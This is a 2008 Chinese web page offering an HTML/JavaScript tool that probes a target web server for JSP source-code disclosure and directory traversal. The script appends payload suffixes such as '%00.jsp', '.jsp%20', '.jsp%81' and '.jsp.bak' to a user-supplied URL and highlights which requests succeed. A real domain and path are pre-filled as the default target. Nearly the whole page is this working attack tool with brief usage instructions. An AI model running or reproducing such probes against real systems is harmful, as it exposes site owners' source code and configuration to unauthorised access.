|
|
|
一个暴jsp源码的网页
编辑: 来源: 日期:2008-03-07 我要投稿
家园 |
|
<head> <base target="_blank"> </head> <style> BODY {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt} BR {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt} TD {FONT-FAMILY: "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt} a {COLOR: #llccxx; text-decoration: none} a:hover {color:#llccxx;text-decoration:none} </style> <center> <pre> 海阳顶端网jsp暴源码及目录网页使用帮助: 第一个写域名;第二个写路径;第三个写文件名,注意不要加扩展名: </pre> <input type=text id=http size=28 style="border:1px solid #99CCdd; " value="http://www.ctm.net"> <input type=text id=path size=36 style="border:1px solid #99CCdd; " value="/cgi-bin/ctm/jsp/cn/NHS/demo/"> <input type=text id=cindex size=6 style="border:1px solid #99CCdd; " value="main"> <input type=button onclick=isExist(http.value) value="检测JSP源码及目录遍历" style="border:1px solid #99CCdd; "> <div id="t"></div> <script> function isExist(url) { var myObject = new Object(); myObject.lcx1 = ".jsp."; myObject.lcx2 = ".jsp+"; myObject.lcx3 = ".jsp%20"; myObject.lcx4 = ".jsp%2e"; myObject.lcx5 = ".jsp%70"; myObject.lcx6 = ".jsp%81"; myObject.lcx7 = ".jsp%2581"; myObject.lcx8 = ".JSP"; myObject.lcx9 = ".Jsp"; myObject.lcx10 = ".jsp.bak"; t.innerHTML+= "<br>目录遍历的方法,暂且收了这么多:<br><br>" t.innerHTML+= "<a href=" +http.value+path.value+">"+http.value+path.value+"<br>"; t.innerHTML+= "<a href=" +http.value+path.value+"%00.jsp>"+http.value+path.value+"%00.jsp<br>"; t.innerHTML+= "<a href=" +http.value+path.value+"%3f.jsp>"+http.value+path.value+"%3f.jsp<br>"; t.innerHTML+= "<a href=" +http.value+path.value+"?.jsp>"+http.value+path.value+"?.jsp<br>"; t.innerHTML+= "<a href=" +http.value+path.value+"web_inf>"+http.value+path.value+"web_inf/<br><br>"; t.innerHTML+= "估计以下有个链接肯定存在暴源码或出错漏洞,俺可不是瞎说,没有漏洞俺不列,下雨阴天闲着也是闲着,挨个点一下看看吧:<br><br>"; for (lcx in myObject) { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP") xmlhttp.open("GET",http.value+path.value+cindex.value+myObject[lcx],false) xmlhttp.send() if(xmlhttp.status==200) t.innerHTML += "<font color=red><a href="+http.value+path.value+cindex.value+myObject[lcx]+">"+http.value+path.value+cindex.value+myObject[lcx]+"<br></font></a>"; else t.innerHTML+= http.value+path.value+cindex.value+myObject[lcx]+"你白费心了,俺不存在漏洞,不用点<br>"; } } </script> </center>
上一篇:判断cookies注入的js语句 下一篇:基于SNMP协议的电信网络监测系统的实现
|
|
|
|
【文章评论】
【收藏本文】
【推荐好友】
【打印本文】
【论坛讨论】 |
相关文章: |
|
 |
文章评论:(0条) |
|
|
|
|
责任编辑:IT学院 声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。 |
|